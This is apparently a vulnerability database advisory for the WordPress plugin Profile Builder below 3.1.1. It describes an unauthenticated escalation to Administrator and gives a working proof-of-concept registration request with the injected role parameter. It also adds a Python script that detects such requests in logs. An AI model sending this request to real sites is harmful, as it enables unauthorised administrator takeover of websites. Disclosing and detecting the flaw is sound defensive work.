Profile Builder and Profile Builder Pro < 3.1.1 - User Registration With Administrator Role



Description
The plugin is affected by a broken authentication vulnerability: an unauthenticated visitor can register a new account, or an existing user can edit their own account, and be given the Administrator role through the plugin's front-end forms.

The vulnerability is reachable only through the plugin's own generated Registration Form or Profile Edit Form, so a blog that uses the [wppb-register] or [wppb-edit-profile] shortcode is vulnerable. These shortcodes provide the plugin's core functionality, so almost any site that has the plugin installed uses at least one of them. A blog that does not use [wppb-register] but does use [wppb-edit-profile] is still vulnerable as long as user registration is enabled. The CVSS score of the vulnerability is 9.
Proof of Concept
Adding the following extra parameter to the registration form POST body, or to the profile edit POST body, creates the new user with, or upgrades the existing user to, the Administrator role. The nonce field in the form (register_unspecified_nonce_field in the request below) is read from the publicly served form and only guards against CSRF, so it does not stop this.

custom_field_user_role=administrator

The problem is at line 194 of profile-builder/front-end/default-fields/user-role/user-role.php in version 3.1.0, the last affected release. A full registration request carrying the parameter:

POST /wordpress-5.3.2/register/ HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------21180001813424994471925010347
Content-Length: 1686
Origin: http://wp.lab
DNT: 1
Connection: close
Referer: http://wp.lab/wordpress-5.3.2/register/
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="username"

test
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="first_name"


-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="last_name"


-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="nickname"


-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="email"

test@localhost.org
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="custom_field_user_role"

administrator
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="description"


-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="passw1"

xxxxxxxx
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="passw2"

xxxxxxxx
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="action"

register
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="form_name"

unspecified
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="register_unspecified_nonce_field"

d02f43e49c
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress-5.3.2/register/
-----------------------------21180001813424994471925010347--
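
The detection side of the PoC, as an added example that is not from the advisory, the researcher, or the plugin: a Python script that rebuilds the multipart body of the request above and checks a captured registration or profile-edit request for custom_field_user_role set to a privileged role. The field names and boundary are the ones in the PoC; PRIVILEGED_ROLES and the function names are this example's own assumptions.

```python
# Added example for this advisory; not the plugin's code or the researcher's
# PoC script. Rebuilds the multipart body shown in the PoC and checks a
# captured request body for the role-escalation parameter. Field names come
# from the PoC; the set of roles treated as privileged is an assumption.
import email

ROLE_FIELD = "custom_field_user_role"

# Roles that must never be assignable through a public registration or
# profile-edit form. "administrator" is the role abused in the PoC; treating
# "editor" as privileged too is this example's own choice.
PRIVILEGED_ROLES = {"administrator", "editor"}

# Boundary and field list taken from the PoC request.
BOUNDARY = "---------------------------21180001813424994471925010347"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY
POC_FIELDS = [
    ("username", "test"),
    ("first_name", ""),
    ("last_name", ""),
    ("nickname", ""),
    ("email", "test@localhost.org"),
    (ROLE_FIELD, "administrator"),  # the injected parameter
    ("description", ""),
    ("passw1", "xxxxxxxx"),
    ("passw2", "xxxxxxxx"),
    ("action", "register"),
    ("form_name", "unspecified"),
    ("register_unspecified_nonce_field", "d02f43e49c"),
    ("_wp_http_referer", "/wordpress-5.3.2/register/"),
]


def build_form_body(fields, boundary=BOUNDARY):
    """Encode (name, value) pairs as a multipart/form-data body.

    Produces the same layout as the PoC request: one part per field,
    CRLF line endings, and a closing boundary.
    """
    chunks = []
    for name, value in fields:
        chunks.append(
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{name}"\r\n'
            f"\r\n"
            f"{value}\r\n"
        )
    chunks.append(f"--{boundary}--\r\n")
    return "".join(chunks).encode("utf-8")


def parse_form_body(content_type, body):
    """Parse a multipart/form-data body into a {field name: value} dict.

    The stdlib email parser handles MIME multipart; the request's
    Content-Type header is prepended so the parser knows the boundary.
    A repeated field name keeps the last value, as PHP's $_POST does.
    """
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    msg = email.message_from_bytes(raw)
    if not msg.is_multipart():
        raise ValueError("body is not multipart/form-data")
    fields = {}
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        if name is None:
            continue  # not a form field
        fields[name] = part.get_payload(decode=True).decode("utf-8")
    return fields


def check_role_escalation(content_type, body, privileged=PRIVILEGED_ROLES):
    """Return (action, role) when the request tries to set a privileged role
    through the plugin's role field, otherwise None.

    Intended for a captured request (WAF log, proxy history, PCAP) to the
    registration or profile-edit endpoint.
    """
    fields = parse_form_body(content_type, body)
    role = fields.get(ROLE_FIELD, "").strip().lower()
    if role in privileged:
        return fields.get("action", ""), role
    return None


# The PoC body, rebuilt from the constructed field list above.
POC_BODY = build_form_body(POC_FIELDS)

if __name__ == "__main__":
    print(check_role_escalation(CONTENT_TYPE, POC_BODY))
```

Feed it the raw body and Content-Type of any POST to the registration or profile-edit page; a hit on action=register from an unauthenticated client is an attempt at this vulnerability regardless of whether the site has been patched, which makes it a useful hunting query over historical logs.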

Affects Plugins

Profile Builder and Profile Builder Pro: fixed in version 3.1.1

References

URL https://www.wordfence.com/blog/2020/02/critical-vulnerability-in-profile-builder-plugin-allowed-site-takeover/

Classification

Type BYPASS

Miscellaneous

Original Researcher Noman Riffat
Submitter Noman Riffat
Submitter Twitter nomanriffat
Views 6128
Verified Yes
WPVDB ID 10066

Timeline

Publicly Published 2020-02-10
Added 2020-02-10
Last Updated 2020-02-15
